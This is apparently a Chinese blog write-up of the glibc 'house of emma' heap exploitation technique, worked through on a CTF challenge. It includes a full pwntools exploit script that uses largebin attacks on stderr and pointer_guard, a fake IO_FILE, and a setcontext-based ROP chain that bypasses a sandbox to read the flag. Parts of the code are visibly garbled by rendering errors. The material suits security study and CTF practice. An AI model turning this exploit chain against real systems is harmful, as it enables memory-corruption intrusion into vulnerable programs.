关于house of emma

最新推荐文章于 2024-09-30 15:42:36 发布
最新推荐文章于 2024-09-30 15:42:36 发布
阅读量65 收藏
点赞数
文章标签: 前端 网络 服务器 网络安全 web安全 eclipse 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/y473158Yansu/article/details/133916107
版权

house of emma

适用范围:

glibc 2.23 – 至今

利用条件:

可以进行两次任意地址写堆地址(通常是largebin attack)

可以触发 IO 流操作

攻击方法:

劫持stderr指针为我们构造的fake_IO_FILE
__pointer_chk_guard 处写入已知内容,来绕过函数指针的调用对保护
触发io流

攻击限制:

若stderr 的指针存放于 bss 段上,无法被我们修改,那么只能通过exit来触发FSOP,但由于我们的构造可能会导致异或内容被篡改后,exit无法正常执行,使得程序无法执行到我们构造的 IO流
需要攻击位于TLS结构体的_pointer_chk_guard,并且远程可能需要爆破TLS偏移

源码分析:

​vtable​虚表中有_IO_cookie_jumps​结构体,在_IO_cookie_jumps​中包含着_IO_cookie_read​、_IO_cookie_write​等一系列函数

这些函数存在着任意函数指针的调用,但是这些函数指针的调用被pointer_guard​ 进行了加密

static ssize_t
_IO_cookie_read (FILE *fp, void *buf, ssize_t size)
{
struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
cookie_read_function_t *read_cb = cfile->__io_functions.read;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (read_cb);
#endif

if (read_cb == NULL)
return -1;

return read_cb (cfile->__cookie, buf, size);
}

static ssize_t
_IO_cookie_write (FILE *fp, const void *buf, ssize_t size)
{
struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
cookie_write_function_t *write_cb = cfile->__io_functions.write;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (write_cb);
#endif

if (write_cb == NULL)
{
fp->_flags |= _IO_ERR_SEEN;
return 0;
}

ssize_t n = write_cb (cfile->__cookie, buf, size);
if (n < size)
fp->_flags |= _IO_ERR_SEEN;

return n;
}

static off64_t
_IO_cookie_seek (FILE *fp, off64_t offset, int dir)
{
struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
cookie_seek_function_t *seek_cb = cfile->__io_functions.seek;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (seek_cb);
#endif

return ((seek_cb == NULL
|| (seek_cb (cfile->__cookie, &offset, dir)
== -1)
|| offset == (off64_t) -1)
? _IO_pos_BAD : offset);
}

static int
_IO_cookie_close (FILE *fp)
{
struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
cookie_close_function_t *close_cb = cfile->__io_functions.close;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (close_cb);
#endif

if (close_cb == NULL)
return 0;

return close_cb (cfile->__cookie);
}

例题2022挑战杯house of cat

保护全开,开了沙箱

程序分析:

限制申请大小 0x418-0x46f,限制修改次数两次并只能修改0x30字节

存在UAF漏洞,限制泄露数据最大大小为0x30字节

题目除了前面的加密,本身算是一道标准的菜单题,不过我们主要是要分析这道题里house of cat手法如何利用,前面需要逆向的部分不再赘述

例题解法:

首先是泄露libc基址和heap地址

largebin attack攻击stderr指针和__pointer_chk_guard

在 stderr 指针处写一个可控地址,在__pointer_chk_guard 处写一个已知地址

再利用UAF通过unsorted bin 会与 top chunk 合并的机制来修改top_chunk大小触发IO调用

进入 house of emma 的调用链,同时利用一个能够转移 rdi 到 rdx 的 gadget 为 setcontext 提供内容

利用 setcontext+61 来执行 orw,从而获取flag

libc和heap地址的泄露

add(0,0x428,b’aaa’)
add(1,0x428,b’./flag\x00’)
delete(0)
add(15,0x448,b’./flag\x00’)
add(14,0x448,b’./flag\x00’)
show(0)
libc_base=l64()-0x21a0d0
li('libc_base = '+hex(libc_base))
heap_base=u64(p.recvuntil(“\x55”)[-6:].ljust(8,b"\x00"))#-0x290
li('heap_addr = '+hex(heap_base))
fake_IO_FILE和orw的模板
fake_file:

gadget = libc_base + 0x00000000001675b0
fake_file = b’0’ * 0x78
fake_file += p64(libc_base+0x21ba60)
fake_file = fake_file.ljust(0xc8, b’\x00’)
fake_file += p64(io_cookie_jumps_addr+0x18)
fake_file += p64(heap_base + 0x10e0 + 0x450)
fake_file += p64(0)
enc_data =((gadget(heap_base+0x1960))>>(64-0x11))|((gadget(heap_base+0x1960))<<0x11)
fake_file += p64(enc_data)
orw:

chunk13=heap_base+0x10d0+0x460 #chunk orw

orw = p64(0) + p64(heap_base+0x10d0+0x460)
orw += b’\x00’ * 0x10
orw += p64(setcontext+61)
orw += b’\x00’ * 0x78
orw += p64(chunk13+0xb0) + p64(ret)

orw += p64(pop_rdi_ret) + p64(0)
orw += p64(close)
#close(0)
orw += p64(pop_rdi_ret) + p64(flag_path)
orw += p64(pop_rsi_ret) + p64(0)
orw += p64(pop_rax_ret) + p64(2)
orw += p64(syscall)
#open(flag_path,0)
orw += p64(pop_rdi_ret) + p64(0)
orw += p64(pop_rsi_ret) + p64(flag_path)
orw += p64(pop_rdx_ret) + p64(0x41)*2
orw += p64(Read)
#read(0,flag_path,0x41)
orw += p64(pop_rdi_ret) + p64(1)
orw += p64(Write)

LargeBin Attack攻击stderr和pointer

stderr攻击:将stderr覆盖为chunk3(fake_file)的地址

add(2,0x428,b’bbb’)
add(3,0x418,fake_file)
delete(2)

add(13,0x438,orw)
add(12,0x438,b’mmm’)

delete(3)
在这里插入图片描述

290-chunk2

6c0-chunk1

af0-chunk15

f40-chunk14

390-chunk3

7b0-chunk13

bf0-chunk12

pl=p64(libc_base+0x21a0e0)*2+p64(heap_base)+p64(stderr-0x20)
edit(2,pl)
在这里插入图片描述在这里插入图片描述

add(11,0x458,b’lll’)
在这里插入图片描述在这里插入图片描述

stderr已被覆盖为chunk3的地址
在这里插入图片描述

chunk3储存着我们伪造的fake_file

fake_file = b’0’ * 0x78
fake_file += p64(libc_base+0x21ba60)
fake_file = fake_file.ljust(0xc8, b’\x00’)
fake_file += p64(io_cookie_jumps_addr+0x18)
fake_file += p64(heap_base + 0x10e0 + 0x450)
fake_file += p64(0)
enc_data =((gadget(heap_base+0x1960))>>(64-0x11))|((gadget(heap_base+0x1960))<<0x11)
fake_file += p64(enc_data)
刚构造后的chunk3:
在这里插入图片描述

delete(3)并edit(2,pl)后的chunk3
在这里插入图片描述

0x3a0-0x3b0并不影响我们fake_file的布局

未修改chunk2后add(11,0x458,b’lll’):

在这里插入图片描述

pointer_guard攻击:pointer_guard覆盖为chunk12的地址
delete(15)
add(10,0x450,b’rrr’)
delete(12)

在这里插入图片描述

li('pointer_guard = '+hex(pointer_guard))

pl=p64(libc_base+0x21a0e0)*2 + p64(heap_base+0x860) + p64(pointer_guard-0x20)
edit(15, pl)
#main_arena+1120 main_arena+1120
#chunk15 pointer_guard-0x20

在这里插入图片描述

我们要修改这里,查看__pointer_chk_guard_local发现它,但是这里又是不可写的
在这里插入图片描述

查看fs_base,这里我们选择攻击的是fs+0x30偏移的这个值

将0xc87d070b4dced3ee覆盖掉
在这里插入图片描述

add(9,0x450,b’hhh’)

在这里插入图片描述

将覆盖pointer_guard为已知的堆地址
在这里插入图片描述

fs[0x30]以被我们修改,也可以看到__pointer_chk_guard_local没有改变

290-chunk2 - edit(stderr)

6c0-chunk1

af0-chunk15 - edit(pointer_guard)

f40-chunk14

390-chunk3 - stderr(fake_file)

7b0-chunk13 orw

bf0-chunk12 - pointer_guard

030-chunk11

修改topchunk大小
​​在这里插入图片描述

​​

add(8,0x450,b’ggg’) #d50

delete(9)
delete(10)
delete(8)
在这里插入图片描述

add(7,0x460,b’a’*0x458 + p64(0x471))
add(6,0x460,b’a’*0x458 + p64(0x451))
在这里插入图片描述

delete(6)
delete(9)
在这里插入图片描述在这里插入图片描述

add(4, 0x460, p64(0) + p64(0x100))
可以看到top_chunk的size已被我们修改
在这里插入图片描述

sa(‘mew mew mew~~~~~~’, ‘CAT | r00t QWB QWXF$\xff’)
sla(‘plz input your cat choice:\n’,str(1))
sla(‘plz input your cat idx:\n’,str(5))
sla(‘plz input your cat size:\n’,str(0x460))

触发IO调用
__malloc_assert

fflush
在这里插入图片描述

_IO_cookie_write
在这里插入图片描述

getkeyserv_handle+576
在这里插入图片描述

orw

chunk13=heap_base+0x10d0+0x460
orw = p64(0) + p64(heap_base+0x10d0+0x460)
orw += b’\x00’ * 0x10
orw += p64(setcontext+61)
orw += b’\x00’ * 0x78
orw += p64(heap_base + 0x10e0 + 0x460+0xa0) + p64(ret)

orw += p64(pop_rdi_ret) + p64(0)
orw += p64(close)
orw += p64(pop_rdi_ret) + p64(flag_path)
orw += p64(pop_rsi_ret) + p64(0)
orw += p64(pop_rax_ret) + p64(2)
orw += p64(syscall)
orw += p64(pop_rdi_ret) + p64(0)
orw += p64(pop_rsi_ret) + p64(flag_path)
orw += p64(pop_rdx_ret) + p64(0x41)*2
orw += p64(Read)
orw += p64(pop_rdi_ret) + p64(1)
orw += p64(Write)
在这里插入图片描述

orw += p64(pop_rdi_ret) + p64(0)
orw += p64(close)
这里的close(0)解释一下,首先我们可以看到沙箱这里调用read的话会查看fd是否为0,非0则直接KILL
在这里插入图片描述

如果我们要将调用flag来读入到内存则一定要使fd为0,但0、1、2(标准输入、输出、错误)均被占用时,我们如果read flag,那么flag文件描述符则为3,程序会截止

而我们首先构造close(0),将标准输入关闭掉,再次read的时候flag文件描述符就将是0,则可以正常read

exp:
from pwn import *
p=process(‘./pwn’)
libc=ELF(‘./libc.so.6’)
context.log_level=‘debug’

s = lambda data :p.send(data)
sa = lambda x, y :p.sendafter(x, y)
sl = lambda data :p.sendline(data)
sla = lambda x, y :p.sendlineafter(x, y)
r = lambda num :p.recv(num)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
itr = lambda :p.interactive()
uu32 = lambda data,num :u32(p.recvuntil(data)[-num:].ljust(4,b’\x00’))
uu64 = lambda data,num :u64(p.recvuntil(data)[-num:].ljust(8,b’\x00’))
leak = lambda name,addr :log.success(‘{} = {:#x}’.format(name, addr))
l64 = lambda :u64(p.recvuntil(“\x7f”)[-6:].ljust(8,b"\x00"))
l32 = lambda :u32(p.recvuntil(“\xf7”)[-4:].ljust(4,b"\x00"))
li = lambda x : print(‘\x1b[01;38;5;214m’ + x + ‘\x1b[0m’)
ll = lambda x : print(‘\x1b[01;38;5;1m’ + x + ‘\x1b[0m’)
context.terminal = [‘gnome-terminal’,‘-x’,‘sh’,‘-c’]

def dbg():
gdb.attach(proc.pidof§[0])
pause()

def add(idx,size,cont):
sa(‘mew mew mew~~~~~~’, ‘CAT | r00t QWB QWXFKaTeX parse error: Undefined control sequence: \xff at position 1: \̲x̲f̲f̲') sla('plz…\xff’)
sla(‘plz input your cat choice:\n’, str(2))
sla(‘plz input your cat idx:\n’,str(idx))
def show(idx):
sa(‘mew mew mew~~~~~~’, ‘CAT | r00t QWB QWXFKaTeX parse error: Undefined control sequence: \xff at position 1: \̲x̲f̲f̲') sla('plz…\xff’)
sla(‘plz input your cat choice:\n’, str(4))
sla(‘plz input your cat idx:\n’,str(idx))
sa(‘plz input your content:\n’, cont)

sa(‘mew mew mew~~~~~~’,‘LOGIN | r00t QWB QWXFadmin’)

add(0,0x428,b’aaa’)
add(1,0x428,b’./flag\x00’)
delete(0)
add(15,0x448,b’./flag\x00’)
add(14,0x448,b’./flag\x00’)
show(0)
libc_base=l64()-0x21a0d0
li('libc_base = '+hex(libc_base))
heap_base=u64(p.recvuntil(“\x55”)[-6:].ljust(8,b"\x00"))#-0x290
li('heap_addr = '+hex(heap_base))

pop_rdi_ret = libc_base + 0x000000000002a3e5
pop_rsi_ret = libc_base + 0x000000000002be51
pop_rdx_ret = libc_base + 0x000000000011f497
pop_rax_ret = libc_base + 0x0000000000045eb0
ret = libc_base + 0x0000000000029cd6

Read = libc_base + libc.sym[‘read’]
Write = libc_base + libc.sym[‘write’]
close = libc_base + libc.sym[‘close’]
system = libc_base + libc.sym[‘system’]
bin_sh = libc_base + 0x00000000001d8698
syscall = Read + 0x10

#print('================================
flag_path = heap_base + 0x440
rtld_global = libc_base + 0x275040 #0x278040
stderr = libc_base + libc.sym[‘stderr’]
setcontext = libc_base + libc.sym[‘setcontext’]

#mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rsp], rax ; call qword ptr [rdx + 0x20]
gadget = libc_base + 0x00000000001675b0
io_cookie_jumps_addr = libc_base + 0x215b80
pointer_guard = libc_base - 0x2890
_IO_stdfile_2_lock=libc_base+0x21ba60

#print('================================

fake_file = b’0’ * 0x78
fake_file += p64(libc_base+0x21ba60)
fake_file = fake_file.ljust(0xc8, b’\x00’)
fake_file += p64(io_cookie_jumps_addr+0x18)
fake_file += p64(heap_base + 0x10e0 + 0x450)
fake_file += p64(0)
enc_data =((gadget(heap_base+0x1960))>>(64-0x11))|((gadget(heap_base+0x1960))<<0x11)
fake_file += p64(enc_data)

chunk13=heap_base+0x10d0+0x460 #chunk orw
orw = p64(0) + p64(heap_base+0x10d0+0x460)
orw += b’\x00’ * 0x10
orw += p64(setcontext+61)
orw += b’\x00’ * 0x78
orw += p64(chunk13+0xb0) + p64(ret)

orw += p64(pop_rdi_ret) + p64(0)
orw += p64(close)
#close(0)
orw += p64(pop_rdi_ret) + p64(flag_path)
orw += p64(pop_rsi_ret) + p64(0)
orw += p64(pop_rax_ret) + p64(2)
orw += p64(syscall)
#open(flag_path,0)
orw += p64(pop_rdi_ret) + p64(0)
orw += p64(pop_rsi_ret) + p64(flag_path)
orw += p64(pop_rdx_ret) + p64(0x41)*2
orw += p64(Read)
#read(0,flag_path,0x41)
orw += p64(pop_rdi_ret) + p64(1)
orw += p64(Write)
#write(1,flag_path,0x41)

#print(‘=================================================sdterr
add(2,0x428,b’bbb’)
add(3,0x418,fake_file)

delete(2)

add(13,0x438,orw)
add(12,0x438,b’mmm’)

delete(3)

pl=p64(libc_base+0x21a0e0)*2+p64(heap_base)+p64(stderr-0x20)
#main_arena+1120 main_arena+1120
#chunk2 stderr-0x20
edit(2,pl)
li('stderr = ‘+hex(stderr))
add(11,0x458,b’lll’) #030

#print('=================================================pointer_guard

delete(15)
add(10,0x450,b’iii’) #490
delete(12)
li('pointer_guard = '+hex(pointer_guard))
edit(15, p64(libc_base+0x21a0e0)*2 + p64(heap_base+0x860) + p64(pointer_guard-0x20))
#main_arena+1120 main_arena+1120
#chunk15 pointer_guard-0x20

add(9,0x450,b’hhh’) #8f0
add(8,0x450,b’ggg’) #d50

delete(9)
delete(10)
delete(8)
‘’’
add(7,0x460,b’fff’)
add(6,0x460,b’eee’)
‘’’

add(7,0x460,b’a’*0x458 + p64(0x471))
add(6,0x460,b’a’*0x458 + p64(0x451))

delete(6)

delete(9)

add(4, 0x460, p64(0) + p64(0x100))
sa(‘mew mew mew~~~~~~’, ‘CAT | r00t QWB QWXF$\xff’)
sla(‘plz input your cat choice:\n’,str(1))
sla(‘plz input your cat idx:\n’,str(5))
sla(‘plz input your cat size:\n’,str(0x460))

itr()

参考:
第七届“湖湘杯” House _OF _Emma | 设计思路与解析-安全客 - 安全资讯平台 (anquanke.com)
强网杯2022&pwn&house_of_cat: https://www.bilibili.com/video/BV1XV4y1j7kf/

喜欢挖漏洞的小夏同学
关注
【人工智能】机器学习的持续交付 (CD4ML)
AI天才研究院
04-29 1万+
机器学习的持续交付 自动化机器学习应用程序的端到端生命周期 机器学习应用程序在我们的行业中变得越来越流行,但是与更传统的软件(例如 Web 服务或移动应用程序)相比,开发、部署和持续改进它们的过程更加复杂。它们会在三个轴上发生变化:代码本身、模型和数据。他们的行为通常很复杂且难以预测,而且他们更难测试、更难解释、更难改进。机器学习持续交付 (CD4ML) 是将持续交付原则和实践引入机器学习应用程序的学科。
程序员需要了解英国文学
s13596191285的博客
11-14 3020
英国文学1、Geoffrey Chaucer杰佛利·乔叟1340-1400长诗:The House of Fame声誉之堂;Troilus and Criseyde特罗勒斯与克丽西德小说:Canterbury Tales坎特伯雷故事集----英国文学史上现实主义第一部杰作(他是最早有人文主义思想的作家,现实主义文学的奠基人)2、William Shakespeare莎士比亚1564-1616The Tempest暴风风雨;The Two Gentlemen of Veronaz维罗纳二绅士;The Merc
house系2
njh18790816639的博客
09-18 408
这里我们续接上回,接着分析高版本的Glibc利用手法,而高版本的利用手法,大都涉及到了io_file以及虚表这类函数指针等。
Linux GLibC Stack Canary Values(转载)
青青的专栏--C/C++ OOA/D Design Pattern
08-30 1126
I was recently been asked by a friend how the Linux’s stack canary values work. After performing a quick online research I wasn’t able to find anything useful to give him. So, here is my writing on ho
绑定非本机地址与透明代理
redwingz的博客
04-10 3052
内核代码内核中对绑定非本地地址的相关判断代码,位于net/ipv4/af_inet.c中:int inet_bind(struct socket *sock, struct sockaddr *uaddr, int addr_len) { chk_addr_ret = inet_addr_type(net, addr-&gt;sin_addr.s_addr); if (!net-&g...
mips-openwrt交叉编译 undefined reference to `__stack_chk_guard 错误
好记性不如赖笔头
12-02 1万+
最近在mips-openwrt的工具链中交叉编译可执行程序时,出现了以下的错误:     undefined reference to `__stack_chk_guard'     undefined reference to `__stack_chk_fail'     百度一下,得知这个错误的引起是因为启用了Stack Guard堆栈保护,什么是堆栈保护呢?如下:
undefined reference to `__stack_chk_guard' .. undefined reference to `__stack_chk_fail'
u012385733的专栏
06-20 1万+
1. 编译出错 undefined reference to `__stack_chk_guard' undefined reference to `__stack_chk_fail' 解决方法-1:添加libssp库 libssp 包含支持GCC堆栈保护函数的程序 解决方法-2 : disable gcc  编译参数 -fstack-protector-all(启用堆栈保护), 将编译...
house of Emma
weixin_46483787的博客
02-08 2212
前言 鸽了好久总算来复现了,由于从libc2.34开始,取消了两个常用的hook,这给我们的攻击带来了很大的困难,于是wjh找到了一种新的攻击方式,这是一种基于一条适用于 GLIBC 2.34 及以下所有版本的 IO_File 调用链进行攻击的手法。 前置知识 (一)largebin attack 见我的另一篇文章:house of pig 攻击手法详解 (二)house of kiwi 当程序没有显示调用exit,也不会通过主函数返回,那么以往我们使用的FSOP就无法进行了,如果此时两个hook也没法利用
House of apple 一种新的glibc中IO攻击方法.doc
07-09
思路三:修改 pointer_guard 线程变量之 house of emma 思路 思路四:修改 global_max_fast 全局变量 House of Apple 方法的优点在于,它可以在高版本 glibc 中实施 IO 攻击,并且可以在仅使用一次 largebin ...
House of apple 一种新的glibc中IO攻击方法
pythonxxoo的博客
06-18 2965
目录* House of apple 一种新的glibc中IO攻击方法 + 前言 + 利用条件 + 利用原理 + 利用思路 - 思路一:修改线程变量 - 思路二:修改结构体 - 思路三:修改线程变量之 - 思路四:修改全局变量 + 例题分析 - 题目分析 - 利用过程 + 总结提出一种新的中利用思路,暂且命名为。众所周知,高版本逐渐移除了等等一众全局变量,中题对钩子的利用将逐渐成为过去式。而想要在高版本利用成功,基本上就离不开对结构体的伪造与流的攻击。之前很多师傅都提出了一些优秀的攻击方法,比如house
关于__stack_chk_guard_ptr的理解
u011801482的专栏
02-21 7592
过年前几天公司无事,开始做些无关的事情,比如玩玩游戏,但是我作为程序员,玩游戏的总是想找一些捷径。比如破解下加密方式,发现一些游戏漏洞等等。 如此,便是反编译了游戏的加密SO。用到的工具是IDA 和 Hopper 这俩都行。因为Mac的IDA 不能变成C。 所以用了下Hopper 还挺好用的。 好了,开始说我遇到的问题: 在静态反汇编一个SO的过程中,开头得到这样一段汇编代码: .text
linux .so有什么借口,为什么有些程序需要连接ld-linux.so.x这个库
weixin_29292535的博客
05-13 347
环境:目标系统为armeabi,32bit,linux,gcc4.9,glibc2.20,宿主机器为ubuntu12.04执行readelf -d xxx.so,发现有些是需要连接ld-linux.so.x的,比如libffi.so:$ /disk7/shuyin.wsy/tv/prebuilts/gcc/linux-x86/arm/arm-linux-gnueabi-4.9-glibc-2.20...
程序员常见系统错误代码大全:1到15841
热门推荐
南北极之间
02-19 10万+
程序员常见系统错误代码大全:1到15841 提示:使用浏览器的Ctrl + F键盘组合来搜索错误代码。要么搜索错误消息本身,要么只搜索错误代码,例如“错误代码635”。 系统错误代码大全:1到15841 错误代码1:功能不正确。[ERROR_INVALID_FUNCTION(0x1)] 错误代码2:系统找不到指定的文件。[ERROR_FILE_NOT_FOUND(0...
编译遇到“__stack_chk_fail_local”错误
duanbeibei的专栏
09-22 6062
若在ubuntu上编译代码遇到"__stack_chk_fail_local"错误时,在makefile CFLAGS中加入"-fno-stack-protector"
【Programming In Lua (2E) 笔记】5:使用C++为Lua编写扩展库(macOS上两种动态库格式的坑)
Small Flows
08-31 3284
本文记录了在macOS上使用c++为lua编写动态库的过程,分享一个容易翻车的坑
Linux编译x86架构内核出现_stack_chk_guard未定义错误
yanxiangyfg的专栏
07-18 6706
背景android模拟器运行于virtualbox中,而virtualbox运行于x86架构的pc端,所以android及其Linux内核都编译成x86架构。当virtualbox的vt未开启的情况下android系统会出现各种问题,如arm库游戏不能运行,桌面平凡挂死重启。通过查看日志,都奔溃在了#00 pc 000183c6 /system/lib/libc.so (__get_thread
登录功能开发 P167重点
最新发布
2303_81204446的博客
09-30 197
前端无法识别controller方法,因此存在Dispa什么的。Claims:jwt中的第二部分。
Vue实战教程:如何用JS封装一个可复用的Loading组件
Jiaberrr的博客
09-28 458
通过以上步骤,我们成功在Vue项目中封装了一个可复用的Loading组件。在实际开发中,我们可以根据项目需求对Loading组件进行样式和功能的扩展,使其更加完善。封装组件是提高代码复用性和维护性的有效手段,希望本文能对你有所帮助。
堆漏洞深入解析:House of Spirit与House of Lore
"这篇文档是关于堆漏洞分析的‘house系列’第一部分,主要讨论了House of Spirit和House of Lore两种技术。文章基于CentOS 6.10 32位系统,内核版本2.6.32,gcc 4.4.7,gdb 7.2和libc 2.12。作者提到了先前关于glibc...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值